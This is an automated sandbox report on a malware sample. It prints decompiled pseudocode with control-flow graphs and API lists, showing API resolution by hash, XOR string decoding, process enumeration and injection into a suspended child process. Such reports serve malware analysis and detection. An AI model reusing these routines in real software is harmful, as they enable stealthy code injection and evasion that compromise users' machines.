            control_flow_graph 179 445ef38-445ef4f 180 445ef51-445ef79 179->180 181 445efac 179->181 180->181 182 445ef7b-445ef9e call 445a5d0 call 445e34a 180->182 183 445efae-445efb2 181->183 188 445efa0-445efaa 182->188 189 445efb3-445efca 182->189 188->181 188->182 190 445f020-445f022 189->190 191 445efcc-445efd4 189->191 190->183 191->190 192 445efd6 191->192 193 445efd8-445efde 192->193 194 445efe0-445efe2 193->194 195 445efee-445efff 193->195 194->195 196 445efe4-445efec 194->196 197 445f004-445f010 LoadLibraryA 195->197 198 445f001-445f002 195->198 196->193 196->195 197->181 199 445f012-445f01c GetProcAddress 197->199 198->197 199->181 200 445f01e 199->200 200->183
            C-Code - Quality: 100%
            			E0445EF38(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0445E34A( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0445A5D0( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























            0x0445ef41
            0x0445ef43
            0x0445ef46
            0x0445ef49
            0x0445ef4f
            0x0445efac
            0x00000000
            0x0445efac
            0x0445ef51
            0x0445ef5c
            0x0445ef5f
            0x0445ef64
            0x0445ef69
            0x0445ef6c
            0x0445ef6e
            0x0445ef71
            0x0445ef74
            0x0445ef79
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0445ef7b
            0x0445ef7b
            0x0445ef8d
            0x0445ef9a
            0x0445ef9e
            0x00000000
            0x00000000
            0x0445efa0
            0x0445efa3
            0x0445efa4
            0x0445efaa
            0x00000000
            0x00000000
            0x00000000
            0x0445efaa
            0x0445efc1
            0x0445efc6
            0x0445efca
            0x00000000
            0x0445efd6
            0x0445efd6
            0x0445efd8
            0x0445efd8
            0x0445efde
            0x00000000
            0x00000000
            0x0445efe4
            0x0445efe8
            0x0445efec
            0x00000000
            0x00000000
            0x00000000
            0x0445efec
            0x0445eff2
            0x0445effa
            0x0445efff
            0x0445f002
            0x0445f002
            0x0445f004
            0x0445f008
            0x0445f010
            0x00000000
            0x00000000
            0x0445f014
            0x0445f01c
            0x00000000
            0x00000000
            0x00000000
            0x0445f01c

            APIs
            • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 0445F008
            • GetProcAddress.KERNEL32(00000000,?), ref: 0445F014
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: .dll
            • API String ID: 2574300362-2738580789
            • Opcode ID: 702429f5657719643bbf86521cba8961b2fd68df130c94fd164540c918728662
            • Instruction ID: e4bbe1beb7afa4cc75d1ba31f323bb631ca026dfc384bbfd2d0984596e024ae2
            • Opcode Fuzzy Hash: 702429f5657719643bbf86521cba8961b2fd68df130c94fd164540c918728662
            • Instruction Fuzzy Hash: 9931B472A00115ABCF24CFA9C984AAFBBE5AF44304F38046ADC05D7362DB70EA41D790
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04458BCD Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94stringCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 201 4458bcd-4458be2 202 4458c05 201->202 203 4458be4-4458be7 201->203 205 4458c0a-4458c2a 202->205 204 4458bee-4458bfe 203->204 206 4458c00-4458c03 204->206 207 4458c5d-4458c5f 204->207 208 4458c2c-4458c31 205->208 209 4458c3a-4458c3e 205->209 206->202 206->204 207->202 213 4458c61-4458c65 call 4458dc9 207->213 208->208 210 4458c33-4458c38 208->210 211 4458c40-4458c4a 209->211 212 4458c4c-4458c56 lstrlenW 209->212 210->209 210->211 211->211 211->212 215 4458c58-4458c5c 212->215 216 4458c6a-4458c72 213->216 217 4458c74-4458c79 216->217 218 4458c7b-4458c80 216->218 217->215 219 4458c82-4458c99 218->219 219->219 220 4458c9b-4458c9e 219->220 220->205
            C-Code - Quality: 80%
            			E04458BCD(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				short _v44;
				void* _t38;
				intOrPtr _t47;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t58;
				intOrPtr _t59;
				void* _t62;
				void* _t64;
				signed int _t71;
				signed int _t74;
				void* _t76;
				void* _t77;

				_t71 = _a12;
				_t53 = __edx;
				_v8 = __ecx;
				_t74 = _t71;
				if(_t71 >= __edx) {
					L4:
					_t54 = 0x446f94e;
					L5:
					_t58 = 0;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsw");
					asm("movsb");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_t38 = 0;
					if(_v28 == 0) {
						L8:
						_t64 = _t38;
						if(_t64 == 0) {
							L10:
							lstrlenW( &_v44);
							return _t54;
						} else {
							goto L9;
						}
						do {
							L9:
							_t19 = _t58 + 0x30; // 0x30
							 *((char*)(_t77 + _t58 - 0x28)) = _t19;
							_t58 = _t58 + 1;
						} while (_t58 < _t64);
						goto L10;
					} else {
						goto L6;
					}
					do {
						L6:
						_t38 = _t38 + 1;
					} while ( *((intOrPtr*)(_t77 + _t38 - 0x18)) != 0);
					_t64 = 0xe;
					if(_t38 > _t64) {
						goto L9;
					}
					goto L8;
				}
				_t59 = _a4;
				_a12 = 0x5a;
				while( *((intOrPtr*)(_t74 % _a12 + _t59)) !=  *((intOrPtr*)(_t74 + _v8))) {
					_t74 = _t74 + 1;
					if(_t74 < _t53) {
						continue;
					}
					goto L4;
				}
				_t76 = _t74 - _t71;
				if(_t76 == 0) {
					goto L4;
				}
				_t47 = E04458DC9(_t76 + 1); // executed
				_t55 = _t47;
				_v12 = _t55;
				if(_t55 != 0) {
					_t56 = _a4;
					_t62 = _t55 - _t71;
					do {
						 *(_t62 + _t71) =  *(_t71 % _a12 + _t56) ^  *(_t71 + _v8);
						_t71 = _t71 + 1;
						_t76 = _t76 - 1;
					} while (_t76 != 0);
					_t54 = _v12;
					goto L5;
				}
				return 0x446f94e;
			}





















            0x04458bd6
            0x04458bd9
            0x04458bdb
            0x04458bde
            0x04458be2
            0x04458c05
            0x04458c05
            0x04458c0a
            0x04458c14
            0x04458c16
            0x04458c17
            0x04458c18
            0x04458c19
            0x04458c1b
            0x04458c1f
            0x04458c20
            0x04458c21
            0x04458c22
            0x04458c24
            0x04458c25
            0x04458c2a
            0x04458c3a
            0x04458c3a
            0x04458c3e
            0x04458c4c
            0x04458c50
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x04458c40
            0x04458c40
            0x04458c40
            0x04458c43
            0x04458c47
            0x04458c48
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x04458c2c
            0x04458c2c
            0x04458c2c
            0x04458c2d
            0x04458c35
            0x04458c38
            0x00000000
            0x00000000
            0x00000000
            0x04458c38
            0x04458be4
            0x04458be7
            0x04458bee
            0x04458c00
            0x04458c03
            0x00000000
            0x00000000
            0x00000000
            0x04458c03
            0x04458c5d
            0x04458c5f
            0x00000000
            0x00000000
            0x04458c65
            0x04458c6a
            0x04458c6c
            0x04458c72
            0x04458c7d
            0x04458c80
            0x04458c82
            0x04458c92
            0x04458c95
            0x04458c96
            0x04458c96
            0x04458c9b
            0x00000000
            0x04458c9b
            0x00000000

            APIs
            • lstrlenW.KERNEL32(?,00000138,?,0446CA88), ref: 04458C50
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: lstrlen
            • String ID: GetCurrentPath$Z
            • API String ID: 1659193697-4005238709
            • Opcode ID: 1ddeb80cc40492b5c65719936cd363dc26281e42b1fb48b0e6da3758434dcfa6
            • Instruction ID: fb15d3b7a0b6f82a2135a504d2cf3fda912a9b0e39654068d93510c7f1517e56
            • Opcode Fuzzy Hash: 1ddeb80cc40492b5c65719936cd363dc26281e42b1fb48b0e6da3758434dcfa6
            • Instruction Fuzzy Hash: 5C21E631B01645AFDF16EF69C48009FBB76BB8D210B14447ADD41AB326DA70F95A8790
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445BAF6 Relevance: 4.6, APIs: 3, Instructions: 66processCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 221 445baf6-445bb1e CreateToolhelp32Snapshot 222 445bb20-445bb49 call 4458f63 Process32First 221->222 223 445bb8e-445bb94 221->223 226 445bb59-445bb69 call 445daf2 222->226 227 445bb4b-445bb57 222->227 230 445bb7e-445bb8b FindCloseChangeNotification 226->230 231 445bb6b-445bb7c 226->231 227->223 230->223 231->226 231->230
            C-Code - Quality: 72%
            			E0445BAF6(void* __ecx, void* __edx) {
				void* _v304;
				char _v308;
				intOrPtr _v312;
				signed int _t16;
				signed int _t17;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t38;
				void* _t43;
				void* _t45;

				_t33 = __edx;
				_v304 = __ecx;
				_t16 = CreateToolhelp32Snapshot(2, 0);
				_t45 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t45 != _t17) {
					E04458F63( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t45,  &_v304) != 0) {
						while(1) {
							_t43 = _v312( &_v308, _t33);
							if(_t43 == 0) {
								break;
							}
							_t38 =  *0x446f8d0; // 0x450f8c0
							_push( &_v308);
							_push(_t45);
							if( *((intOrPtr*)(_t38 + 0x44))() != 0) {
								continue;
							}
							break;
						}
						FindCloseChangeNotification(_t45);
						_t17 = 0 | _t43 == 0x00000000;
					} else {
						_t30 =  *0x446f8d0; // 0x450f8c0
						 *((intOrPtr*)(_t30 + 0x30))(_t45);
						_t17 = 0xfffffffe;
					}
				}
				return _t17;
			}













            0x0445bb0e
            0x0445bb10
            0x0445bb14
            0x0445bb17
            0x0445bb19
            0x0445bb1e
            0x0445bb2d
            0x0445bb35
            0x0445bb49
            0x0445bb59
            0x0445bb63
            0x0445bb69
            0x00000000
            0x00000000
            0x0445bb6b
            0x0445bb75
            0x0445bb76
            0x0445bb7c
            0x00000000
            0x00000000
            0x00000000
            0x0445bb7c
            0x0445bb84
            0x0445bb8b
            0x0445bb4b
            0x0445bb4b
            0x0445bb51
            0x0445bb56
            0x0445bb56
            0x0445bb49
            0x0445bb94

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 0445BB14
              • Part of subcall function 04458F63: memset.MSVCRT ref: 04458F75
            • Process32First.KERNEL32(00000000,?), ref: 0445BB44
            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0445BB84
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
            • String ID:
            • API String ID: 3344077921-0
            • Opcode ID: 92332d4cbb77512173c26d3321f74461f5009166788e7154f2a9b102ccac230d
            • Instruction ID: d49bb9e5faa03efba83ac7e579ae39584a59db0d14251975e278a788dfdb4ca7
            • Opcode Fuzzy Hash: 92332d4cbb77512173c26d3321f74461f5009166788e7154f2a9b102ccac230d
            • Instruction Fuzzy Hash: B81108322046419FDB20EE69EC48E6777ECFF88360F04065FF964C7295EB24E9048762
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445C986 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 234 445c986-445c9a6 GetTokenInformation 235 445c9ec 234->235 236 445c9a8-445c9b1 GetLastError 234->236 238 445c9ee-445c9f2 235->238 236->235 237 445c9b3-445c9c3 call 4458dc9 236->237 241 445c9c5-445c9c7 237->241 242 445c9c9-445c9dc GetTokenInformation 237->242 241->238 242->235 243 445c9de-445c9ea call 4458ddf 242->243 243->241
            C-Code - Quality: 86%
            			E0445C986(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E04458DC9(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E04458DDF( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










            0x0445c989
            0x0445c98a
            0x0445c991
            0x0445c999
            0x0445c99d
            0x0445c9a6
            0x0445c9ec
            0x0445c9ec
            0x0445c9b3
            0x0445c9bb
            0x0445c9bd
            0x0445c9c3
            0x0445c9dc
            0x00000000
            0x0445c9de
            0x0445c9e3
            0x00000000
            0x0445c9e9
            0x0445c9c5
            0x0445c9c5
            0x0445c9c5
            0x0445c9c5
            0x0445c9c3
            0x0445c9f2

            APIs
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,04450000,00000000,00000000,?,0445CA07,00000000,00000000,?,0445CA30), ref: 0445C9A1
            • GetLastError.KERNEL32(?,0445CA07,00000000,00000000,?,0445CA30,00001644,?,0445E053), ref: 0445C9A8
              • Part of subcall function 04458DC9: RtlAllocateHeap.NTDLL(00000008,?,?,04459793,00000100,?,0445661B), ref: 04458DD7
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,0445CA07,00000000,00000000,?,0445CA30,00001644,?,0445E053), ref: 0445C9D7
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: InformationToken$AllocateErrorHeapLast
            • String ID:
            • API String ID: 2499131667-0
            • Opcode ID: cb1887322d5089fb0621eb5ae9acc7dc49872482de94dcf68cbd07f759e5b0c5
            • Instruction ID: 6b53f6f162b24788f8cf2340b5a3110755a76df7b0a581f18465aa6891b0e4ac
            • Opcode Fuzzy Hash: cb1887322d5089fb0621eb5ae9acc7dc49872482de94dcf68cbd07f759e5b0c5
            • Instruction Fuzzy Hash: 4E016272700214FF9F206FA6EC89D9B7FECDF456A0710056BF905D2222EA30ED0097A0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445BE10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40processCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 246 445be10-445be5f call 4458f63 * 2 CreateProcessW
            C-Code - Quality: 79%
            			E0445BE10(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E04458F63(__edx, 0, 0x10);
				E04458F63( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}





            0x0445be21
            0x0445be2e
            0x0445be36
            0x0445be52
            0x0445be58
            0x0445be5f

            APIs
              • Part of subcall function 04458F63: memset.MSVCRT ref: 04458F75
            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0445BE52
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: CreateProcessmemset
            • String ID: D
            • API String ID: 2296119082-2746444292
            • Opcode ID: d6885cd9984846e8eebc6d3f3efe308cbdb2eec4be9cf0928741834ab23cd090
            • Instruction ID: 65b807e0b6aca700726a25ee2c522e652cc8bb9cd805cebd30a7c888a4e18269
            • Opcode Fuzzy Hash: d6885cd9984846e8eebc6d3f3efe308cbdb2eec4be9cf0928741834ab23cd090
            • Instruction Fuzzy Hash: DEF06CF26406087EFB20F556DC0AFBF36ACDB45714F500115BF05E71D1EAA4AD0582B5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445D889 Relevance: 3.1, APIs: 2, Instructions: 120COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 251 445d889-445d8a9 call 445d7cd 254 445d8af-445d8ce call 445b6e3 251->254 255 445d9da-445d9dd 251->255 258 445d8d4-445d8d6 254->258 259 445d9ca-445d9d9 call 4458ddf 254->259 260 445d8dc-445d8de 258->260 261 445d9b8-445d9c8 call 4458ddf 258->261 259->255 263 445d8e1-445d8e3 260->263 261->259 266 445d9a6-445d9b2 263->266 267 445d8e9-445d908 call 4458f63 call 445be10 263->267 266->258 266->261 273 445d96a-445d96e 267->273 274 445d90a-445d91d call 445d9de 267->274 275 445d970-445d972 273->275 276 445d999-445d9a0 273->276 274->273 281 445d91f-445d937 274->281 278 445d974-445d97a 275->278 279 445d983-445d993 275->279 276->263 276->266 278->279 279->276 284 445d967 281->284 285 445d939-445d94e GetLastError call 445dadc 281->285 284->273 288 445d950-445d95b 285->288 289 445d963-445d964 FindCloseChangeNotification 285->289 291 445d95d 288->291 292 445d95e 288->292 289->284 291->292 292->289
            C-Code - Quality: 96%
            			E0445D889(intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				signed int _t45;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t59;
				void* _t62;
				intOrPtr _t63;
				signed int _t67;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t86;
				char _t87;
				void* _t88;

				_v16 = _v16 & 0x00000000;
				_v20 = __edx;
				_t86 = 0;
				_t37 = E0445D7CD( &_v16, __edx);
				_t87 = _t37;
				_v24 = _t87;
				_t89 = _t87;
				if(_t87 == 0) {
					return _t37;
				}
				_t38 =  *0x446f8d4; // 0x450fc00
				_t7 = _t38 + 0xac; // 0x515dc7f8
				E0445B6E3( &_v80,  *_t7 + 7, _t89);
				_v12 = _v12 & 0;
				_t67 = _v16;
				if(_t67 == 0) {
					L21:
					E04458DDF( &_v24, 0);
					return _t86;
				}
				while(_t86 == 0) {
					_t69 = 0;
					_v8 = 0;
					while(_t86 == 0) {
						E04458F63( &_v40, _t86, 0x10);
						_t88 = _t88 + 0xc;
						_t49 = E0445BE10( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
						_t94 = _t49;
						if(_t49 >= 0) {
							_t56 = E0445D9DE(E04456297,  &_v40, _t94, _v20); // executed
							if(_t56 != 0) {
								_t59 =  *0x446f8d0; // 0x450f8c0
								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
								if(_t70 != 0) {
									GetLastError();
									_t62 = E0445DADC( &_v40);
									_t63 =  *0x446f8d0; // 0x450f8c0
									if(_t62 != 0) {
										_push(0xea60);
										_push(_t70);
										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
											_t86 = _t86 + 1;
										}
										_t63 =  *0x446f8d0; // 0x450f8c0
									}
									FindCloseChangeNotification(_t70);
								}
								_t69 = _v8;
							}
						}
						if(_v40 != 0) {
							if(_t86 == 0) {
								_t54 =  *0x446f8d0; // 0x450f8c0
								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
							}
							_t50 =  *0x446f8d0; // 0x450f8c0
							 *((intOrPtr*)(_t50 + 0x30))(_v36);
							_t52 =  *0x446f8d0; // 0x450f8c0
							 *((intOrPtr*)(_t52 + 0x30))(_v40);
						}
						_t69 = _t69 + 1;
						_v8 = _t69;
						if(_t69 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t67 = _v16;
					_t45 = _v12 + 1;
					_v12 = _t45;
					if(_t45 < _t67) {
						continue;
					} else {
						break;
					}
					do {
						goto L20;
					} while (_t67 != 0);
					goto L21;
				}
				L20:
				E04458DDF(_t87, 0xfffffffe);
				_t87 = _t87 + 4;
				_t67 = _t67 - 1;
			}




























            0x0445d88f
            0x0445d898
            0x0445d89b
            0x0445d89d
            0x0445d8a2
            0x0445d8a4
            0x0445d8a7
            0x0445d8a9
            0x0445d9dd
            0x0445d9dd
            0x0445d8af
            0x0445d8b8
            0x0445d8c1
            0x0445d8c6
            0x0445d8c9
            0x0445d8ce
            0x0445d9ca
            0x0445d9d0
            0x00000000
            0x0445d9d9
            0x0445d8d4
            0x0445d8dc
            0x0445d8de
            0x0445d8e1
            0x0445d8f0
            0x0445d8fb
            0x0445d901
            0x0445d906
            0x0445d908
            0x0445d915
            0x0445d91d
            0x0445d928
            0x0445d933
            0x0445d937
            0x0445d939
            0x0445d942
            0x0445d949
            0x0445d94e
            0x0445d950
            0x0445d955
            0x0445d95b
            0x0445d95d
            0x0445d95d
            0x0445d95e
            0x0445d95e
            0x0445d964
            0x0445d964
            0x0445d967
            0x0445d967
            0x0445d91d
            0x0445d96e
            0x0445d972
            0x0445d974
            0x0445d97d
            0x0445d97d
            0x0445d983
            0x0445d98b
            0x0445d98e
            0x0445d996
            0x0445d996
            0x0445d999
            0x0445d99a
            0x0445d9a0
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0445d9a0
            0x0445d9a9
            0x0445d9ac
            0x0445d9ad
            0x0445d9b2
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0445d9b8
            0x00000000
            0x00000000
            0x00000000
            0x0445d9b8
            0x0445d9b8
            0x0445d9bb
            0x0445d9c1
            0x0445d9c5

            APIs
              • Part of subcall function 04458F63: memset.MSVCRT ref: 04458F75
              • Part of subcall function 0445BE10: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0445BE52
              • Part of subcall function 0445D9DE: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0445DA40
              • Part of subcall function 0445D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0445DA89
              • Part of subcall function 0445D9DE: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0445DAA6
              • Part of subcall function 0445D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0445DAC7
            • GetLastError.KERNEL32(?,?,00000001), ref: 0445D939
              • Part of subcall function 0445DADC: ResumeThread.KERNELBASE(?,0445D947,?,?,00000001), ref: 0445DAE4
            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 0445D964
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
            • String ID:
            • API String ID: 2212882986-0
            • Opcode ID: a12d4c5dfc101f37851d77aedb65d92de9c45d714d1da9f008e455a42d44fdd4
            • Instruction ID: fd928e7c0fcc4124a84e775834535ef83e3d11f4c19fb9d775c55bc435edba79
            • Opcode Fuzzy Hash: a12d4c5dfc101f37851d77aedb65d92de9c45d714d1da9f008e455a42d44fdd4
            • Instruction Fuzzy Hash: B24153B1E00205AFEF11EF95D984A9EB7F9FF48314F14806AED05A7266D770AD04CB61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04456603 Relevance: 3.1, APIs: 2, Instructions: 78threadCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 61%
            			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
				long _v8;
				intOrPtr _t15;
				WCHAR* _t23;
				long _t24;
				void* _t28;
				void* _t31;
				intOrPtr _t36;
				void* _t41;
				void* _t48;
				intOrPtr* _t49;

				_push(__ecx);
				if(_a8 != 1) {
					__eflags = _a8;
					if(_a8 != 0) {
						L7:
						__eflags = 1;
						return 1;
					}
					_t15 =  *0x446f8d0; // 0x450f8c0
					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
					L3:
					return 0;
				}
				E04458DB4();
				E04459787();
				 *0x446f8e8 = _a4;
				E04463D36(_a4);
				 *_t49 = 0xf2e;
				 *0x446f8d0 = E0445F0D9(0x446ca88, 0x138);
				 *_t49 = 0xe8d;
				_t23 = E04459F85(0x446ca88);
				_pop(_t41);
				_a8 = _t23;
				_t24 = GetFileAttributesW(_t23); // executed
				_push( &_a8);
				if(_t24 == 0xffffffff) {
					E04458D9A();
					 *_t49 = 0x1f4;
					_t28 = E0445FCDA(E0445109A(_t41));
					_a8 = _t28;
					__eflags = _t28;
					if(_t28 != 0) {
						_t48 = 0x54;
						 *0x446f8e0 = E0445F0D9(0x446cbf0, _t48);
						E0445647A(_t48, __eflags);
						E04458DDF( &_a8, 0xfffffffe);
						_t36 =  *0x446f8d0; // 0x450f8c0
						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x641);
					}
					_v8 = 0;
					_t31 = CreateThread(0, 0, E044563A2, 0, 0,  &_v8);
					 *0x446f8f4 = _t31;
					__eflags = _t31;
					if(_t31 == 0) {
						goto L3;
					} else {
						goto L7;
					}
				}
				E04458D9A();
				goto L3;
			}













            0x04456606
            0x0445660b
            0x044566ef
            0x044566f3
            0x044566e8
            0x044566ea
            0x00000000
            0x044566ea
            0x044566f5
            0x044566ff
            0x0445666a
            0x00000000
            0x0445666a
            0x04456611
            0x04456616
            0x0445661f
            0x04456624
            0x0445662e
            0x0445663f
            0x04456644
            0x0445664b
            0x04456650
            0x04456652
            0x04456655
            0x04456661
            0x04456662
            0x0445666e
            0x04456673
            0x04456682
            0x04456687
            0x0445668a
            0x0445668c
            0x04456695
            0x044566a0
            0x044566a5
            0x044566b0
            0x044566b5
            0x044566bf
            0x044566bf
            0x044566d9
            0x044566dc
            0x044566df
            0x044566e4
            0x044566e6
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x044566e6
            0x04456664
            0x00000000

            APIs
              • Part of subcall function 04458DB4: HeapCreate.KERNELBASE(00000000,00096000,00000000,04456616), ref: 04458DBD
